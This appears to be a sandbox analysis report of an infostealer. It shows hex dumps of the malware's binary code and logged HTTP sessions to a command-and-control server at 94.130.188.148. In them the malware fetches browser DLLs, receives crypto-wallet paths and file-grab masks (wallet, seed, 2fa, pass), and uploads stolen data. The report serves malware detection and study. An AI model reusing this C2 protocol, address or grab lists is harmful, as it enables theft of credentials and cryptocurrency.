                                                                                      Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00
                                                                                      Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23
                                                                                      Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00
                                                                                      Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00
                                                                                      Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00
                                                                                      Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15
                                                                                      Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25
                                                                                      Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      15 | 192.168.2.5 | 59952 | 94.130.188.148 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-08-29 18:49:45 UTC | 230 | OUT | GET /vcruntime140.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:46 UTC261INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:45 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 80880
                                                                                      Connection: close
                                                                                      Last-Modified: Thursday, 29-Aug-2024 18:49:45 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 59953 | 94.130.188.148 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:49:47 UTC | 222 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Connection: Keep-Alive
Cache-Control: no-cache
2024-08-29 18:49:47 UTC | 263 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:47 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Connection: close
Last-Modified: Thursday, 29-Aug-2024 18:49:47 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 59954 | 94.130.188.148 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:49:51 UTC | 307 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FBFIDBFHDBGIDHJJEGHI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Content-Length: 1145
Connection: Keep-Alive
Cache-Control: no-cache
2024-08-29 18:49:51 UTC | 1145 | OUT | Data Ascii: ------FBFIDBFHDBGIDHJJEGHIContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------FBFIDBFHDBGIDHJJEGHIContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------FBFIDBFHDBGIDHJJEGHICont
2024-08-29 18:49:52 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-08-29 18:49:52 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 59955 | 94.130.188.148 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:49:52 UTC | 306 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-08-29 18:49:52 UTC | 331 | OUT | Data Ascii: ------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------IDBGHDGHCGHCAAKFIIECCont
2024-08-29 18:49:53 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-08-29 18:49:53 UTC | 2228 | IN | Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 59956 | 94.130.188.148 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:49:53 UTC | 306 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-08-29 18:49:53 UTC | 331 | OUT | Data Ascii: ------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------HIIEBAFCBKFIDGCAKKKFCont
2024-08-29 18:49:54 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-08-29 18:49:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 59957 | 94.130.188.148 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:49:55 UTC | 306 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FBAAAKFCAFIIDHIDGHIE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                      2024-08-29 18:49:55 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------FBAAAKFCAFIIDHIDGHIEContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------FBAAAKFCAFIIDHIDGHIEContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------FBAAAKFCAFIIDHIDGHIECont
2024-08-29 18:49:56 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:56 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:49:56 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                      Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


Session ID:21
Source IP:192.168.2.5
Source Port:59958
Destination IP:94.130.188.148
Destination Port:443
PID:2260
Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:49:56 UTC | 306 | OUT | POST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCB
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 457
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:56 UTC457OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------AEBAFBGIDHCBFHIECFCBCont
2024-08-29 18:49:57 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:57 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
2024-08-29 18:49:57 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0 (chunked encoding: one 2-byte chunk "ok" followed by the terminating zero-size chunk; the decoded body is "ok")


Session ID:22
Source IP:192.168.2.5
Source Port:59959
Destination IP:94.130.188.148
Destination Port:443
PID:2260
Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:49:58 UTC | 309 | OUT | POST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 114253
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:58 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------IDHIEBAAKJDHIECAAFHCCont
                                                                                      2024-08-29 18:49:58 UTC16355OUTData Raw: 50 2f 41 50 45 56 54 78 47 44 35 50 5a 38 79 73 64 53 77 2b 4d 35 2f 61 63 72 75 61 48 67 37 78 42 4e 63 33 65 6c 61 46 65 35 4e 7a 5a 58 62 6d 4e 75 75 55 45 4d 6f 49 4a 39 69 51 50 70 39 4b 70 2b 4e 2f 38 41 6b 62 62 76 2f 64 6a 2f 41 50 51 46 72 55 38 4c 2b 41 64 57 30 58 78 48 61 61 6a 64 58 46 6d 38 55 4f 2f 63 49 33 63 74 79 68 55 59 79 6f 39 52 33 72 4c 38 62 2f 38 41 49 32 33 6e 30 6a 2f 39 41 57 75 57 69 36 55 73 63 6e 53 64 31 5a 2f 66 71 61 59 78 56 59 35 63 31 56 56 6e 7a 4c 37 74 44 6e 71 53 6c 6f 72 32 6a 35 6f 53 69 6c 70 4b 59 47 70 34 62 2f 35 47 58 54 66 2b 76 68 50 35 31 30 6e 6a 37 78 44 50 6f 32 70 58 56 72 61 35 53 61 39 73 6f 56 38 30 48 37 69 71 38 32 63 65 35 33 44 39 61 35 76 77 35 2f 79 4d 75 6d 2f 39 66 4b 66 7a 72 72 76 47 76
                                                                                      Data Ascii: P/APEVTxGD5PZ8ysdSw+M5/acruaHg7xBNc3elaFe5NzZXbmNuuUEMoIJ9iQPp9Kp+N/8Akbbv/dj/APQFrU8L+AdW0XxHaajdXFm8UO/cI3ctyhUYyo9R3rL8b/8AI23n0j/9AWuWi6UscnSd1Z/fqaYxVY5c1VVnzL7tDnqSlor2j5oSilpKYGp4b/5GXTf+vhP510nj7xDPo2pXVra5Sa9soV80H7iq82ce53D9a5vw5/yMum/9fKfzrrvGv
                                                                                      2024-08-29 18:49:58 UTC16355OUTData Raw: 67 63 54 6f 6d 2b 69 2f 77 43 44 39 35 36 4c 7a 4c 43 4e 79 6c 79 39 58 70 62 66 61 33 33 45 6c 76 65 50 5a 61 76 71 6d 6d 53 53 36 65 6b 75 6c 36 57 54 4e 64 33 55 48 6e 52 69 35 4d 30 51 62 6a 59 35 49 55 48 59 50 6c 50 63 39 7a 56 6e 54 39 52 48 6b 32 62 79 33 4f 69 4f 31 78 72 4c 32 37 72 39 69 35 76 45 45 63 52 45 63 4a 4d 51 45 5a 4a 59 67 46 6a 47 41 57 7a 6d 73 2b 54 54 62 6d 61 61 39 6e 6b 75 56 61 61 2b 79 4c 70 2f 4c 58 39 36 43 77 63 6a 47 4f 4f 56 42 34 78 30 71 64 4c 65 39 74 59 31 69 73 35 37 65 4b 4a 5a 54 4d 6d 36 31 69 64 34 35 43 41 43 36 4f 79 6c 6b 62 43 6a 6c 53 4f 67 72 4e 34 48 46 75 4f 72 31 30 2f 4f 37 4e 59 35 6e 67 56 4e 4a 52 73 6c 66 38 72 49 6f 44 58 72 33 54 64 4e 30 7a 79 62 47 31 6b 6b 75 49 70 4c 69 34 4e 31 45 6b 78 4a
                                                                                      Data Ascii: gcTom+i/wCD956LzLCNyly9Xpbfa33ElvePZavqmmSS6ekul6WTNd3UHnRi5M0QbjY5IUHYPlPc9zVnT9RHk2by3OiO1xrL27r9i5vEEcREcJMQEZJYgFjGAWzms+TTbmaa9nkuVaa+yLp/LX96CwcjGOOVB4x0qdLe9tY1is57eKJZTMm61id45CAC6OylkbCjlSOgrN4HFuOr10/O7NY5ngVNJRslf8rIoDXr3TdN0zybG1kkuIpLi4N1EkxJ
